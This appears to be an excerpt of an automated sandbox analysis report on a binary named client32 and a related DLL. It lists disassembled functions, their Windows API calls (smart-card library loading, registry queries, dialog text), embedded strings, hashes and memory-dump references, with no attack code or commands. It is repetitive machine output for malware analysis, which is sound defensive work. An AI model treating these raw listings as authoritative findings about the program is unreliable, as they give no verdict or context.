                                                                                                • Instruction ID: f7f10b9968dab71d17c942d8aeee915bceb1fa530a294d1dec7827d31b267bb9
                                                                                                • Opcode Fuzzy Hash: 34b9f969c4d19c0e7baf2dd3f37f97cf9b60c30be318a93855af6e654d3a9457
                                                                                                • Instruction Fuzzy Hash: C931D8B5D001056BDB41CFA8AC01BEF77F89F45218F049168E80AE7201F7359B15D7E2
                                                                                                Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110AD1E3
                                                                                                  • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll), ref: 110ACEC4
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEE1
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEEE
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACEFC
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF0A
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF18
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF26
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF34
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF42
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF50
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF5E
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF6C
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF7A
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF88
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACF96
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFA4
                                                                                                  • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?), ref: 110ACFB2
                                                                                                • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                                Strings
                                                                                                • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad_memset
                                                                                                • String ID: winscard.dll is NOT valid!!!
                                                                                                • API String ID: 212038770-1939809930
                                                                                                • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                                • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                                • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                                Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                • String ID: string too long
                                                                                                • API String ID: 963545896-2556327735
                                                                                                • Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                • Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
                                                                                                • Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
                                                                                                • Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1
                                                                                                Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItemTextA.USER32 ref: 110232D7
                                                                                                • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemText
                                                                                                • String ID: ...
                                                                                                • API String ID: 3367045223-440645147
                                                                                                • Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                • Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
                                                                                                • Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
                                                                                                • Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90
                                                                                                Function 69CEF3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEF3B4
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D01928
                                                                                                  • Part of subcall function 69D01913: __CxxThrowException@8.LIBCMT ref: 69D0193D
                                                                                                  • Part of subcall function 69D01913: std::exception::exception.LIBCMT ref: 69D0194E
                                                                                                • _memmove.LIBCMT ref: 69CEF3FB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: string too long
                                                                                                • API String ID: 1785806476-2556327735
                                                                                                • Opcode ID: f334e1455a4883ff01917b8294e3ddca2c62c87d1603968ff55a28897a3a29cb
                                                                                                • Instruction ID: c5e050d03d96d28991f17626e1790d88e41063c0e1088fe976c69392cf932c89
                                                                                                • Opcode Fuzzy Hash: f334e1455a4883ff01917b8294e3ddca2c62c87d1603968ff55a28897a3a29cb
                                                                                                • Instruction Fuzzy Hash: 801104765083145FE720DF78B8D0A6EB7A8EF55228F604E3EE593C3581E761E48893B1
                                                                                                Function 69CF8BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: @
                                                                                                • API String ID: 4104443479-2766056989
                                                                                                • Opcode ID: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                • Instruction ID: 423866375232ddf03fb8e7685e09a8bba7599b7aaa980d2627dba1c15bcf4393
                                                                                                • Opcode Fuzzy Hash: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                • Instruction Fuzzy Hash: 2811E1B6500309AFCB50CF55E8C0D9A3769EF94214B10892DE9078B201F730EA4AC7A1
                                                                                                Function 110391C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                  • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32 ref: 110CBA0C
                                                                                                  • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                                                • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                                                • _memset.LIBCMT ref: 11039216
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ItemText$Window$ObjectRectShow_memset
                                                                                                • String ID: 445817
                                                                                                • API String ID: 3037201586-3924157528
                                                                                                • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                                                • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                                                • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                                                Function 110ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryValueExA.ADVAPI32 ref: 110ED600
                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValuewvsprintf
                                                                                                • String ID: ($Error %d getting %s
                                                                                                • API String ID: 141982866-3697087921
                                                                                                • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                                                • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                                                • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                                                Function 69CEC890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 69CEC8A6
                                                                                                  • Part of subcall function 69D01960: std::exception::exception.LIBCMT ref: 69D01975
                                                                                                  • Part of subcall function 69D01960: __CxxThrowException@8.LIBCMT ref: 69D0198A
                                                                                                  • Part of subcall function 69D01960: std::exception::exception.LIBCMT ref: 69D0199B
                                                                                                • _memmove.LIBCMT ref: 69CEC8DF
                                                                                                Strings
                                                                                                • invalid string position, xrefs: 69CEC8A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                • String ID: invalid string position
                                                                                                • API String ID: 1785806476-1799206989
                                                                                                • Opcode ID: e46e1f0d5a65b0dcbaa3841df005026d9afa0c5d27dc2f1e2c195512b04d8c2a
                                                                                                • Instruction ID: 98a468a14ac7264630e2b87be4513df587ca2d47ac07c80b138ecfbef8390043
                                                                                                • Opcode Fuzzy Hash: e46e1f0d5a65b0dcbaa3841df005026d9afa0c5d27dc2f1e2c195512b04d8c2a
                                                                                                • Instruction Fuzzy Hash: 1C0126327802085BD734CE6CFD8091ABBAAEBC5754B24493DE182CB704E771EC4183E1
                                                                                                Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                                                • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                                                • API String ID: 2102423945-1777407139
                                                                                                • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                                                • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                                                • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                                                Function 69CFBA20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __strdup
                                                                                                • String ID: *this==pszSrc$NSMString.cpp
                                                                                                • API String ID: 838363481-1924475612
                                                                                                • Opcode ID: 6479b3d1f5a7fbda806bdfd950a5a25d8e5a290d607b1d9a972b9fa62fd7c344
                                                                                                • Instruction ID: 6a33640cede4faf6b707cf7972c9e0933d88709d190e4f47aec8dd68ec1eb503
                                                                                                • Opcode Fuzzy Hash: 6479b3d1f5a7fbda806bdfd950a5a25d8e5a290d607b1d9a972b9fa62fd7c344
                                                                                                • Instruction Fuzzy Hash: C6F028B1A003041BC200DF59B901A57FBA9CF9126CB04C03AFA9DC7B10F730D9078691
                                                                                                Function 69CFC860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
